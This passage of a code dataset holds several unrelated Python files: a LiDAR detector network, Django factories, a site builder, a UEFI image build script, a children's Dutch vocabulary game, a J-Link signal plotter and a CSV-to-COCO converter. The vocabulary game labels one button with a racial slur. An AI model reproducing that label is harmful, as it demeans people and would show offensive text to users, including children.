n_cutout, self._embed_len)\n\n \n embed_tmp = self.custom_conv(\n self.atten_mem.view(-1, n_channel, n_pts)\n ).view(-1, n_cutout, self._embed_len)\n\n # pair-wise similarity (batch, cutout, cutout)\n sim_score = torch.matmul(embed_x, embed_tmp.permute(0, 2, 1))\n\n # masked softmax\n sim_score = sim_score - 1e10 * (1.0 - self.neighbour_masks)\n max_sim = sim_score.max(dim=-1, keepdim=True)[0]\n 
exp_sim = torch.exp(sim_score - max_sim) * self.neighbour_masks\n exps_sum = exp_sim.sum(dim=-1, keepdim=True)\n sim_score = exp_sim / exps_sum\n\n # weighted average on the template\n atten_mem = self.atten_mem.view(n_batch, n_cutout, -1)\n atten_mem_w = torch.matmul(sim_score, atten_mem).view(-1, n_cutout, n_channel, n_pts)\n\n # update memory using auto-regressive\n self.atten_mem = self._alpha * sig_new + (1.0 - self._alpha) * atten_mem_w\n\n return self.atten_mem, sim_score\n\n def _generate_neighbour_masks(self, sig):\n \n n_cutout = sig.shape[1]\n half_ws = int(self._win_size / 2)\n inds_col = torch.arange(n_cutout).unsqueeze(dim=-1).long()\n win_inds = torch.arange(-half_ws, half_ws + 1).long()\n inds_col = inds_col + win_inds.unsqueeze(dim=0) # (cutout, neighbours)\n \n inds_col = (\n inds_col % n_cutout\n if self._pano_scan and not self.training\n else inds_col.clamp(min=0, max=n_cutout - 1)\n )\n inds_row = torch.arange(n_cutout).unsqueeze(dim=-1).expand_as(inds_col).long()\n inds_full = torch.stack((inds_row, inds_col), dim=2).view(-1, 2)\n\n nb_masks = torch.zeros(n_cutout, n_cutout).float()\n nb_masks[inds_full[:, 0], inds_full[:, 1]] = 1.0\n return nb_masks.cuda(sig.get_device()) if sig.is_cuda else nb_masks, inds_full\n","repo_name":"Ascend/ascend_community_projects","sub_path":"2D_LiDAR_Pedestrain_Detection/LaserDet/srcs/nets/dr_spaam.py","file_name":"dr_spaam.py","file_ext":"py","file_size_in_byte":7025,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"37709136253","text":"from datetime import timedelta\n\nimport factory.fuzzy\nfrom django.utils import timezone\n\nfrom poradnia.cases.factories import CaseFactory\nfrom poradnia.users.factories import UserFactory\n\n\nclass EventFactory(factory.django.DjangoModelFactory):\n text = factory.Sequence(\"event-text-{}\".format)\n deadline = True\n time = factory.fuzzy.FuzzyDateTime(timezone.now())\n created_by = factory.SubFactory(UserFactory)\n created_on = factory.fuzzy.FuzzyDateTime(timezone.now() - timedelta(hours=5))\n case = factory.SubFactory(CaseFactory)\n\n class Meta:\n model = \"events.Event\"\n\n\nclass ReminderFactory(factory.django.DjangoModelFactory):\n user = factory.SubFactory(UserFactory)\n event = factory.SubFactory(EventFactory)\n\n class Meta:\n model = \"events.Reminder\"\n","repo_name":"watchdogpolska/poradnia","sub_path":"poradnia/events/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"27"} +{"seq_id":"13330500060","text":"\"\"\"Main script to build the website from jinja templates.\"\"\"\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\n\n\nenv = Environment(\n loader=FileSystemLoader(searchpath=\"./templates/\"),\n autoescape=select_autoescape()\n)\n\nif __name__ == \"__main__\":\n # pages to build\n pages = [\n \"index.html\",\n \"supported-devices.html\",\n \"faq.html\",\n \"download.html\",\n \"imprint.html\",\n \"privacy.html\",\n \"feedback.html\",\n \"404.html\",\n ]\n\n # Load template files and write the rendered HTML\n for page in pages:\n # render the templates\n template = env.get_template(page)\n output = template.render(\n version=\"v0.5.0-beta\",\n n_supported_devices=73,\n )\n\n # write to file\n with open(f\"public/{page}\", \"w\") as html_output:\n 
html_output.write(output)\n","repo_name":"openandroidinstaller-dev/openandroidinstaller-dev.github.io","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"6626100073","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport tempfile\nimport subprocess\nimport re\nimport platform\n\nSCRIPT_DIR = os.path.dirname(__file__)\nSOURCE_ROOT = os.path.join(SCRIPT_DIR, '..')\n\nsys.path.append(os.path.join(SOURCE_ROOT, 'scripts'))\nimport anillo_util\n\nif len(sys.argv) != 8:\n\tprint('Usage: ' + sys.argv[0] + ' <arch> <uefi-bootstrap> <kernel> <uefi-script> <config> <ramdisk> <output-image>')\n\tsys.exit(1)\n\nARCH = sys.argv[1]\nUEFI_BOOTSTRAP_PATH = sys.argv[2]\nKERNEL_PATH = sys.argv[3]\nUEFI_SCRIPT_PATH = sys.argv[4]\nCONFIG_PATH = sys.argv[5]\nRAMDISK_PATH = sys.argv[6]\nOUTPUT_IMAGE_PATH = sys.argv[7]\n\nARCH_MAP = {\n\t'x86_64': 'BOOTx64.efi',\n\t'aarch64': 'BOOTaa64.efi',\n}\n\nEFI_SIZE_MB = 64\nDISK_SIZE_MB = 1024\n\nmount_dir = tempfile.TemporaryDirectory()\n\nif os.path.exists(OUTPUT_IMAGE_PATH):\n\tos.remove(OUTPUT_IMAGE_PATH)\n\ndef partfs_mount():\n\tanillo_util.run_or_fail(['partfs', '-o', 'dev=' + OUTPUT_IMAGE_PATH, mount_dir.name])\n\ndef partfs_unmount():\n\tif platform.system() == 'Darwin':\n\t\tanillo_util.run_or_fail(['umount', mount_dir.name])\n\telse:\n\t\tanillo_util.run_or_fail(['fusermount', '-u', mount_dir.name])\n\ndef fat_mkdir_p(image, path):\n\tcurr_path = ''\n\tfor component in path.split(os.sep):\n\t\tcurr_path = os.path.join(curr_path, component)\n\t\tif subprocess.call(['mdir', '-i', image, '::' + curr_path], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT) != 0:\n\t\t\tanillo_util.run_or_fail(['mmd', '-i', image, '::' + curr_path])\n\ndef fat_copy(image, source, dest):\n\tanillo_util.run_or_fail(['mcopy', '-D', 'o', '-i', image, source, '::' + dest])\n\nanillo_util.run_or_fail(['qemu-img', 'create', '-f', 'raw', OUTPUT_IMAGE_PATH, str(DISK_SIZE_MB) + 'M'])\n\nanillo_util.run_or_fail(['sgdisk', '-o', OUTPUT_IMAGE_PATH])\n\nimage_info = subprocess.check_output(['sgdisk', '-p', OUTPUT_IMAGE_PATH]).decode()\n\nsector_size = int(re.search(r'Sector size \\(logical\\): ([0-9]+).*', image_info).group(1))\nfirst_sector = int(re.search(r'First usable sector is ([0-9]+).*', image_info).group(1))\nsector_alignment = int(re.search(r'Partitions will be aligned on ([0-9]+).*', image_info).group(1))\n\nfirst_aligned_sector = anillo_util.round_up_to_multiple(first_sector, sector_alignment)\nefi_sector_count = int((EFI_SIZE_MB * 1024 * 1024) / sector_size)\nlast_efi_sector = first_aligned_sector + efi_sector_count\n\nanillo_util.run_or_fail(['sgdisk', '-o', '-n', '1:' + str(first_aligned_sector) + ':' + str(last_efi_sector), '-t', '1:0700', OUTPUT_IMAGE_PATH])\n\npartfs_mount()\n\nefi_image_path = os.path.join(mount_dir.name, 'p1')\n\nanillo_util.run_or_fail(['mkfs.fat', efi_image_path])\n\nfat_mkdir_p(efi_image_path, 'EFI/anillo')\nfat_mkdir_p(efi_image_path, 'EFI/BOOT')\n\nfat_copy(efi_image_path, UEFI_SCRIPT_PATH, 'startup.nsh')\nfat_copy(efi_image_path, CONFIG_PATH, 'EFI/anillo/config.txt')\nfat_copy(efi_image_path, UEFI_BOOTSTRAP_PATH, 'EFI/anillo/ferro-bootstrap.efi')\nfat_copy(efi_image_path, UEFI_BOOTSTRAP_PATH, 'EFI/BOOT/' + ARCH_MAP[ARCH])\nfat_copy(efi_image_path, KERNEL_PATH, 'EFI/anillo/ferro')\nfat_copy(efi_image_path, RAMDISK_PATH, 
'EFI/anillo/ramdisk')\n\npartfs_unmount()\n","repo_name":"anillo-os/anillo-os","sub_path":"scripts/build-image.py","file_name":"build-image.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"7640453349","text":"# -*- coding: utf-8 -*-\nimport sqlite3\nimport random\nfrom sqlite3 import Error\nimport tkinter\nfrom tkinter import *\nfrom PIL import Image, ImageTk\nfrom gtts import gTTS\nimport os\nfrom playsound import playsound\nimport os.path\nfrom pathlib import Path\nfrom os import listdir\nfrom os.path import isfile, join\nfrom random import randrange\nimport time\nimport googletrans\nfrom googletrans import Translator\nfrom google_trans_new import google_translator\nfrom tkinter import ttk\nfrom tkinter.messagebox import showinfo\n\n####DO ZROBIENIA:\n #konwersja mp3 do bitow, zeby nie zapisywac\n #wybor kazdego jezyka swiata\n #zaznaczanie niewlasciwych tlumaczen\n\nlistajezykow = googletrans.LANGUAGES\nprint(googletrans.LANGUAGES)\n\n\nvalues = listajezykow.values()\nvalues_list = list(values)\nprint(values_list)\n\n\ntranslator = google_translator()\ntranslate_text = translator.translate('Hola mundo!', lang_src='nl', lang_tgt='en')\nprint(translate_text)\n\n\nclass gierka:\n language = 'nl'\n\n\n\n def random_line():\n mypath = \"img/\"\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n a = random.choice(onlyfiles)\n b = os.path.splitext(a)[0]\n\n #stare i chujowe, to wyzej bierze z nazwy jotpegow\n #lines = open('dodane.txt').read().splitlines()\n # myline = random.choice(lines)\n # print(myline)\n return b\n\n #wyjebalem sejwowanie jako osobne pliki, teraz sejwuje jako jeden tymczasowy i usuwa i dziala w kazdym jezyku\n def tts(slowko, jezyk):\n jezyk = gierka.language\n gierka.mytext = translator.translate(slowko, lang_src='nl', lang_tgt=jezyk.format())\n #return\n\n if jezyk == 'en':\n gierka.mytext = translator.translate(slowko, lang_src='nl', lang_tgt='en')\n\n if jezyk == 'de':\n gierka.mytext = translator.translate(slowko, lang_src='nl', lang_tgt='de')\n\n if jezyk == 'nl':\n gierka.mytext = slowko\n\n if jezyk == 'pl':\n gierka.mytext = translator.translate(slowko, lang_src='nl', lang_tgt='pl')\n\n\n #mytext = slowko\n ####BARDZO WAZNE PONIZEJ USUNAC KOMENTARZ\n #language = 'nl'\n #if gierka.language == 'en':\n #print(gierka.mytext)\n\n\n #adres = ('sounds/{}.mp3'.format(gierka.mytext))\n adres = 'sounds/rozwiazanie.mp3'.format()\n myobj = gTTS(text=gierka.mytext, lang=gierka.language, slow=False)\n #if os.path.isfile(adres) == False:\n # print('yo')\n\n # my_file = Path(\"{}\".format(adres))\n # if my_file.exists() == False:\n # myobj.save(adres)\n # print('ks')\n myobj.save(adres)\n\n # file exists\n playsound(adres)\n os.remove(adres)\n\n\n #def klik():\n # for widget in frame.winfo_children():\n # widget.destroy()\n # frame.pack_forget()\n #okienko()\n\n\n def okienko():\n #global czy\n # def klik():\n # for widget in frame.winfo_children():\n # widget.destroy()\n # frame.pack_forget()\n #okienko()\n\n window = Tk()\n def lewy():\n if gierka.czy == 0:\n n = 'Ja, super!'\n gierka.tts(n, gierka.language)\n gierka.czy = None\n ramka()\n return\n\n if gierka.czy == 1:\n n = 'Nee. Probeer opnieuw'\n gierka.tts(n, gierka.language)\n return\n\n\n def prawy(event=None):\n\n if gierka.czy == 1:\n #global czy\n n = 'Ja, super!'\n gierka.tts(n, gierka.language)\n gierka.czy = None\n ramka()\n return\n #okienko()\n\n if gierka.czy == 0:\n\n n = 'Nee. 
Probeer opnieuw'\n gierka.tts(n, gierka.language)\n return\n\n\n # def losowanieslow():\n\n # a = gierka.random_line()\n # a2 = gierka.random_line()\n # if a2 == a:\n # a2 = gierka.random_line()\n #if a2 == a:\n # a2 = gierka.random_line()\n #if a2 == a:\n # a2 = gierka.random_line()\n # if a2 == a:\n # a2 = gierka.random_line()\n\n # ktoreslowko = randrange(2)\n # print(randrange(2))\n # return a,a2,ktoreslowko\n\n def setanylanguage():\n gierka.language = value_to_key(cb.get())\n print(gierka.language)\n ramka()\n return\n\n def setnl():\n gierka.language = 'nl'\n ramka()\n return\n\n def setang():\n gierka.language = 'en'\n ramka()\n return\n\n def setde():\n gierka.language = 'de'\n ramka()\n return\n\n def setpl():\n gierka.language = 'pl'\n ramka()\n return\n\n def ramka():\n ktoreslowko = randrange(2)\n print(randrange(2))\n\n gierka.czy = ktoreslowko\n\n #self.czy = None\n frame = Frame(window)\n for widget in frame.winfo_children():\n widget.destroy()\n frame.place_forget()\n #frame.grid_forget()\n frame.place(x=20, y=50)\n a=gierka.random_line()\n\n #obrazekLabel2.unbind('')\n\n\n slowkoLabel = Label(frame, text='{}'.format(a))\n slowkoLabel.grid(row=2, column=1)\n\n\n image = Image.open(\"img/{}.jpg\".format(a))\n image = image.resize((250, 250), Image.ANTIALIAS)\n obrazek = ImageTk.PhotoImage(image)\n\n ###teraz zamiast tego jest button\n obrazekLabel = Label(frame, image=obrazek)\n obrazekLabel.image = obrazek\n #linia ponizej jako komentarz (test)\n obrazekLabel.grid(row=1, column=1)\n\n lewyButton = Button(window, text='LEWY', image=obrazek, command=lewy)\n lewyButton.grid(row=3, column=1)\n\n\n\n a2 = gierka.random_line()\n if a2 == a:\n a2 = gierka.random_line()\n if a2 == a:\n a2 = gierka.random_line()\n if a2 == a:\n a2 = gierka.random_line()\n if a2 == a:\n a2 = gierka.random_line()\n\n slowkoLabel2 = Label(frame, text='{}'.format(a2))\n slowkoLabel2.grid(row=2, column=2)\n\n image2 = Image.open(\"img/{}.jpg\".format(a2))\n image2 = image2.resize((250, 250), Image.ANTIALIAS)\n obrazek2 = ImageTk.PhotoImage(image2)\n\n #####teraz zamiast tego jest button\n obrazekLabel2 = Label(frame, image=obrazek2)\n obrazekLabel2.image = obrazek2\n ###linia ponizej dodana jako komentarz (test)\n obrazekLabel2.grid(row=1, column=2)\n #obrazekLabel2.bind('', prawy)\n\n prawyButton = Button(window, text='PRAWY', image=obrazek2, command=prawy)\n prawyButton.grid(row=3, column=2)\n\n if ktoreslowko == 0:\n gierka.tts(a, gierka.language)\n if ktoreslowko == 1:\n gierka.tts(a2, gierka.language)\n\n #gierka.czy = None\n # obrazekLabel2.bind(on_click)\n #time.sleep(5)\n\n\n\n #def czydobrze(ccc):\n # return\n\n\n\n\n ######button przeniesiony na dol, zeby z kompa dalo sie lepiej grac\n #nastepnyButton = Button(window, text='nastepny')\n nastepnyButton = Button(window, text='niderlandzki', command=setnl)\n nastepnyButton.place(x=300, y=360)\n\n nastepnyButtonAngielski = Button(window, text='angielski', command=setang)\n nastepnyButtonAngielski.place(x=380, y=360)\n\n nastepnyButtonEs = Button(window, text='niemiecki', command=setde)\n nastepnyButtonEs.place(x=460, y=360)\n\n nastepnyButtonPl = Button(window, text='polski', command=setpl)\n nastepnyButtonPl.place(x=560, y=360)\n\n nastepnyButtonAny = Button(window, text='Come on nigga', command=setanylanguage)\n nastepnyButtonAny.place(x=560, y=500)\n\n #cb = ttk.Combobox(window, values=[ \"January\",\"February\",\"March\", \"April\"])\n\n selected_language = tkinter.StringVar()\n\n cb = ttk.Combobox(window, textvariable=selected_language)\n 
cb['values'] = values_list\n cb.place(x=500, y=420)\n\n def month_changed(event):\n msg = f'You selected {cb.get()}!'\n showinfo(title='Result', message=msg)\n\n def language_changed(event):\n gierka.language_value = f'{cb.get()}'\n print(gierka.language_value)\n value_to_key(gierka.language_value)\n\n def value_to_key(a):\n for key, value in listajezykow.items():\n if value == a:\n print(key)\n return key\n\n #cb.bind('<<ComboboxSelected>>', month_changed)\n cb.bind('<<ComboboxSelected>>', language_changed)\n\n print(cb.get())\n ## search_age = cb.get()\n #for name, age in listajezykow.items():\n # if age == search_age:\n # print(name)\n\n\n #ramka()\n\n\n\n\n\n\n\n # load = Image.open(\"img/aap.jpg\")\n #render = ImageTk.PhotoImage(load)\n # img = Label(self, image=render)\n # img.image = render\n # img.place(x=0, y=0)\n\n window.title(\"Nauka slowek dla dzieci\")\n window.geometry('800x600')\n window.mainloop()\n def wpisywanie():\n lan_1: str = input(\"Slowko po holendersku:\")\n lan_2: str = input(\"Slowko po polsku:\")\n rzecz: str = input(\"Jaka to czesc mowy?\")\n\n\n\n # this function still needs to be checked\n def wprowadz_slowo(slowa):\n database = r\"C:\\sqlite\\db\\kid.db\"\n conn = create_connection(database)\n\n sql = ''' INSERT INTO words (language_1,language_2,language_3,adding_date,rzeczownik,category)\n VALUES(?,?,?,?,?,?) '''\n\n cur = conn.cursor()\n cur.execute(sql, slowa)\n conn.commit()\n conn.close()\n #print(' Liczba dzisiaj dodanych slowek: ', ile_dodanych_dzis())\n return cur.lastrowid\n\n def create_connection(db_file):\n \"\"\" create a database connection to the SQLite database\n specified by db_file\n :param db_file: database file\n :return: Connection object or None\n \"\"\"\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n return conn\n\n def create_table(conn, create_words_table):\n \"\"\" create a table from the create_table_sql statement\n :param create_words_table:\n :param conn: Connection object\n :param create_table_sql: a CREATE TABLE statement\n :return:\n \"\"\"\n try:\n c = conn.cursor()\n c.execute(create_words_table)\n except Error as e:\n print(e)\n\n\n def main():\n\n database = r\"C:\\sqlite\\db\\kid.db\"\n create_words_table = \"\"\" CREATE TABLE IF NOT EXISTS words (\n id integer PRIMARY KEY,\n language_1 text,\n language_2 text,\n sentence_1 text,\n sentence_2 text,\n sound1 text,\n sound2 text,\n sound3 text,\n sound4 text,\n language_5 text,\n category text,\n pic1 text,\n pic2 text,\n movie1 text,\n movie2 text,\n rzeczownik text,\n irregular_verb text,\n adding_date text,\n taken_from_language text\n ); \"\"\"\n algorytm = \"\"\" CREATE TABLE IF NOT EXISTS algorytm (\n id integer PRIMARY KEY,\n id_slowka integer,\n prawidlowo integer,\n nieprawidlowo integer,\n ile_poprawnych_z_rzedu integer,\n nauczone text,\n data_nauczenia text,\n i_p_z_rz_2 integer,\n utrwalone text,\n data_utrwalenia text,\n ostatecznie_utrwalone text,\n data_ostatecznego text\n ); \"\"\"\n\n user = \"\"\" CREATE TABLE IF NOT EXISTS user (\n id integer PRIMARY KEY,\n data text,\n ile_razy integer,\n prawidlowo integer,\n nieprawidlowo integer,\n ile_poprawnych_z_rzedu_temp integer,\n ile_poprawnych_max integer,\n ile_nauczonych text\n ); \"\"\"\n\n conn = gierka.create_connection(database)\n\n if conn is not None:\n gierka.create_table(conn, create_words_table)\n gierka.create_table(conn, algorytm)\n gierka.create_table(conn, user)\n #test()\n #random_line()\n #tts('heb je honger')\n gierka.okienko()\n\n else:\n print(\"Error! 
cannot create the database connection.\")\n\n\n\n\nif __name__ == '__main__':\n gierka.main()\n","repo_name":"spotispoti/fiszki","sub_path":"dzialajacagra220521.py","file_name":"dzialajacagra220521.py","file_ext":"py","file_size_in_byte":14417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71632521672","text":"import time\nimport JLinkWrapper\n\nimport IOCParser\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\nclass Plotter:\n def __init__(self, ioc, jlink, elfreader):\n self._ioc = ioc\n self._jlink = jlink\n self._elfreader = elfreader\n\n def _read_gpio(self):\n gpio_data = dict()\n \n input_reg_data = dict()\n output_reg_data = dict()\n for i in self._ioc.inputGpios:\n input_reg_data[i] = self._jlink.read_register(i, 'IDR')\n for o in self._ioc.outputGpios:\n output_reg_data[o] = self._jlink.read_register(o, 'ODR')\n\n for sig in self._ioc.signals:\n if self._ioc.signals[sig] == 'GPIO_Input':\n gpio_data[sig] = (input_reg_data[self._ioc.gpio[sig]] >> self._ioc.pin_num[sig]) & 1\n if self._ioc.signals[sig] == 'GPIO_Output':\n gpio_data[sig] = (output_reg_data[self._ioc.gpio[sig]] >> self._ioc.pin_num[sig]) & 1\n\n return gpio_data\n\n\n def plot_gpio(self, time_sec, delta_sec):\n x_vals = []\n y_vals = [[] for i in range(len(self._ioc.signals))]\n\n start_time = time.time()\n\n while (time.time() - start_time) < time_sec:\n sample_time = time.time()\n x_vals.append(sample_time - start_time)\n data = self._read_gpio()\n idx = 0\n for val in data:\n y_vals[idx].append(data[val])\n idx += 1\n time_to_sleep = delta_sec - (time.time() - sample_time)\n if time_to_sleep > 0:\n time.sleep(time_to_sleep)\n else:\n print('Missed sample point by ' + str(time_to_sleep * -1) + ' seconds')\n\n # TODO: Create data in second thread and update once per second?\n _, ax = plt.subplots(len(self._ioc.digital_signals), sharex=True)\n \n if len(self._ioc.digital_signals) > 1:\n io_num = 0\n for sig in self._ioc.digital_signals:\n ax[io_num].cla()\n ax[io_num].set_title(sig + ' (' + self._ioc.labels[sig] + ') [' + self._ioc.signals[sig] + ']')\n ax[io_num].set_ylim([-0.2, 1.2])\n ax[io_num].set_yticks([0,1])\n ax[io_num].step(x_vals, y_vals[io_num])\n io_num += 1\n else:\n sig = next(iter(self._ioc.digital_signals.keys()))\n ax.cla()\n ax.set_title(sig + ' (' + self._ioc.labels[sig] + ') [' + self._ioc.signals[sig] + ']')\n ax.set_ylim([-0.2, 1.2])\n ax.set_yticks([0,1])\n ax.step(x_vals, y_vals[0])\n \n plt.subplots_adjust(hspace=1)\n plt.xlabel('time (sec)')\n plt.show()\n\n def plot_adc(self, time_sec, delta_sec):\n addr = self._elfreader.getAddressOfSym('adcBuffer')\n size = self._elfreader.getSizeOfSym('adcBuffer')\n num_elem = int(size / 2)\n \n x_vals = []\n y_vals = [[] for i in range(num_elem)]\n\n start_time = time.time()\n\n while (time.time() - start_time) < time_sec:\n sample_time = time.time()\n x_vals.append(sample_time - start_time)\n data = self._jlink.memory_read16(addr, num_elem)\n idx = 0\n for val in data:\n y_vals[idx].append(val)\n idx += 1\n time_to_sleep = delta_sec - (time.time() - sample_time)\n if time_to_sleep > 0:\n time.sleep(time_to_sleep)\n else:\n print('Missed sample point by ' + str(time_to_sleep * -1) + ' seconds')\n\n # TODO: Create data in second thread and update once per second?\n _, ax = plt.subplots(num_elem, sharex=True)\n \n if num_elem > 1:\n io_num = 0\n # first print all signals of first ADC, then go to the next and so on...\n for adc in self._ioc.adcs:\n for sig 
in self._ioc.adcs[adc].regularConversionPins:\n ax[io_num].cla()\n ax[io_num].set_title(self._gen_adc_title(sig))\n ax[io_num].plot(x_vals, y_vals[io_num])\n io_num += 1\n else:\n # Print single signal\n sig = next(iter(self._ioc.analog_signals.keys()))\n ax.cla()\n ax.set_title(self._gen_adc_title(sig))\n ax.plot(x_vals, y_vals[0])\n \n plt.subplots_adjust(hspace=1)\n plt.xlabel('time (sec)')\n plt.show()\n \n def _gen_adc_title(self, sig):\n titlestr = sig\n if sig in self._ioc.labels:\n titlestr += ' (' + self._ioc.labels[sig] + ')'\n if sig in self._ioc.signals:\n titlestr += ' [' + self._ioc.signals[sig] + ']'\n return titlestr\n\n #def animate_gpio_plot(i, jlink):\t\n#\todr_val = jlink.read_register('GPIOA', 'ODR')\n#\t\n#\tx_vals.append(i)\n#\t\n#\tio_num = 0\n#\n#\tfor p in ax:\n#\t\ty_vals[io_num].append((odr_val >> io_num) & 1)\n#\t\tp.cla()\n#\t\tp.set_title('Bit ' + str(io_num))\n#\t\tp.step(x_vals, y_vals[io_num])\n#\t\tio_num += 1\n#\t\n#\t#for row in ax:\n#\t#\trow.scatter(i, (odr_val >> pin) & 1)\n#\t#\tpin += 1\n#\tplt.tight_layout()\n\n#def plot_gpio(time, delta):\n#\tglobal ax\n#\tglobal y_vals\n#\n#\t# TODO: Create data in second thread and update once per second?\n#\tfig,ax = plt.subplots(8)\n#\n#\tfor i in range(8):\n#\t\ty_vals.append([])\n#\n#\tani = FuncAnimation(plt.gcf(), animate_gpio_plot, interval=delta)\n#\n#\tplt.tight_layout()\n#\tplt.show()\n\n#def plot_gpio(time, delta):\n# fig, ax = plt.subplots(8, sharex=True)\n# fig.suptitle('Bla')\n# for i in range(time):\n# odr_val = read_register('GPIOA', 'ODR')\n# pin = 0\n# for row in ax:\n# row.scatter(i, (odr_val >> pin) & 1)\n# pin += 1\n# plt.pause(0.05)\n#","repo_name":"lrademacher/PyJLink","sub_path":"SignalPlotter.py","file_name":"SignalPlotter.py","file_ext":"py","file_size_in_byte":5771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"38479382606","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\nimport numpy as np\nimport pandas as pd\nimport glob\nimport cv2\nimport os\nimport shutil\nfrom IPython import embed\nfrom tqdm import tqdm\nimport argparse\n#0为背景\nparser = argparse.ArgumentParser(description='convert object label')\nparser.add_argument('keyframe_dir', metavar='DIR',\n help='path to frame dir')\nparser.add_argument('--mode', type=str, choices=['train', 'val', 'test'])\n\nargs = parser.parse_args()\nobj_name = open('objects_en.txt','r')\nobj_list = [line.rstrip() for line in obj_name]\nprint(obj_list)\nclass Csv2CoCo:\n\n def __init__(self,image_dir,total_annos):\n self.images = []\n self.annotations = []\n self.categories = []\n self.img_id = 0\n self.ann_id = 0\n self.image_dir = image_dir\n self.total_annos = total_annos\n\n def save_coco_json(self, instance, save_path):\n json.dump(instance, open(save_path, 'w'), ensure_ascii=False, indent=2) # indent=2 更加美观显示\n\n # 由txt文件构建COCO\n def to_coco(self, keys):\n self._init_categories()\n for key in keys:\n self.images.append(self._image(key))\n shapes = self.total_annos[key]\n for shape in shapes:\n bboxi = []\n for cor in shape[:-1]:\n bboxi.append(int(cor))\n label = shape[-1]\n #print('label',label)\n annotation = self._annotation(bboxi,label)\n print('annotation',annotation)\n self.annotations.append(annotation)\n self.ann_id += 1\n self.img_id += 1\n instance = {}\n instance['info'] = 'spytensor created'\n instance['license'] = ['license']\n instance['images'] = self.images\n instance['annotations'] = self.annotations\n instance['categories'] = self.categories\n return 
instance\n def to_coco_test(self, keys):\n self._init_categories()\n for key in keys:\n self.images.append(self._image(key))\n shapes = self.total_annos[key]\n for shape in shapes:\n bboxi = []\n for cor in shape[:-1]:\n bboxi.append(int(cor))\n #label = shape[-1]\n #print('label',label)\n #annotation = self._annotation(bboxi,label)\n #print('annotation',annotation)\n #self.annotations.append(annotation)\n #self.ann_id += 1\n self.img_id += 1\n instance = {}\n instance['info'] = 'spytensor created'\n instance['license'] = ['license']\n instance['images'] = self.images\n #instance['annotations'] = self.annotations\n instance['categories'] = self.categories\n return instance\n\n # build the category list\n def _init_categories(self):\n for k in obj_list:#classname_to_id.items():\n category = {}\n category['id'] = obj_list.index(k)\n category['name'] = k\n self.categories.append(category)\n\n # build the COCO image field\n def _image(self, path):\n image = {}\n print(path)\n img = cv2.imread(self.image_dir + path)\n image['height'] = img.shape[0]\n image['width'] = img.shape[1]\n image['id'] = self.img_id\n image['file_name'] = path\n return image\n\n # build the COCO annotation field\n def _annotation(self, shape,label):\n # label = shape[-1]\n points = shape[:4]\n annotation = {}\n annotation['id'] = self.ann_id\n annotation['image_id'] = self.img_id\n annotation['category_id'] = int(obj_list.index(label))\n annotation['segmentation'] = self._get_seg(points)\n annotation['bbox'] = self._get_box(points)\n annotation['iscrowd'] = 0\n annotation['area'] = 1.0\n return annotation\n\n # COCO format: [x1,y1,w,h] matches the COCO bbox layout\n def _get_box(self, points):\n min_x = points[0]\n min_y = points[1]\n max_x = points[2]\n max_y = points[3]\n return [min_x, min_y, max_x - min_x, max_y - min_y]\n # segmentation\n def _get_seg(self, points):\n min_x = points[0]\n min_y = points[1]\n max_x = points[2]\n max_y = points[3]\n h = max_y - min_y\n w = max_x - min_x\n a = []\n a.append([min_x,min_y, min_x,min_y+0.5*h, min_x,max_y, min_x+0.5*w,max_y, max_x,max_y, max_x,max_y-0.5*h, max_x,min_y, max_x-0.5*w,min_y])\n return a\n \n\nif __name__ == '__main__':\n csv_file = \"{}.csv\".format(args.mode)\n image_dir = args.keyframe_dir#\"/home/sda/videonet/train/image/train/\"\n #print('image_dir',image_dir)\n saved_coco_path = \"./\"\n # consolidate the csv annotation files\n total_csv_annotations = {}\n annotations = pd.read_csv(csv_file,header=None).values\n for annotation in annotations:\n #print(annotation[0].split(os.sep)[-2]+'/'+annotation[0].split(os.sep)[-1])\n key = annotation[0].split(os.sep)[-2]+'/'+annotation[0].split(os.sep)[-1]\n value = np.array([annotation[1:]])\n if key in total_csv_annotations.keys():\n total_csv_annotations[key] = np.concatenate((total_csv_annotations[key],value),axis=0)\n else:\n total_csv_annotations[key] = value\n # split the data by key\n total_keys = list(total_csv_annotations.keys())\n in_keys = total_keys\n print(\"{}_n:\".format(args.mode), len(in_keys))#, 'val_n:', len(val_keys))\n # create the required folders\n if not os.path.exists('%scoco/annotations/'%saved_coco_path):\n os.makedirs('%scoco/annotations/'%saved_coco_path)\n if not os.path.exists('%scoco/train2017/'%saved_coco_path):\n os.makedirs('%scoco/train2017/'%saved_coco_path)\n if not os.path.exists('%scoco/val2017/'%saved_coco_path):\n os.makedirs('%scoco/val2017/'%saved_coco_path)\n if not os.path.exists('%scoco/test2017/'%saved_coco_path):\n os.makedirs('%scoco/test2017/'%saved_coco_path)\n # convert the training set to COCO json format\n for file in in_keys:\n if not 
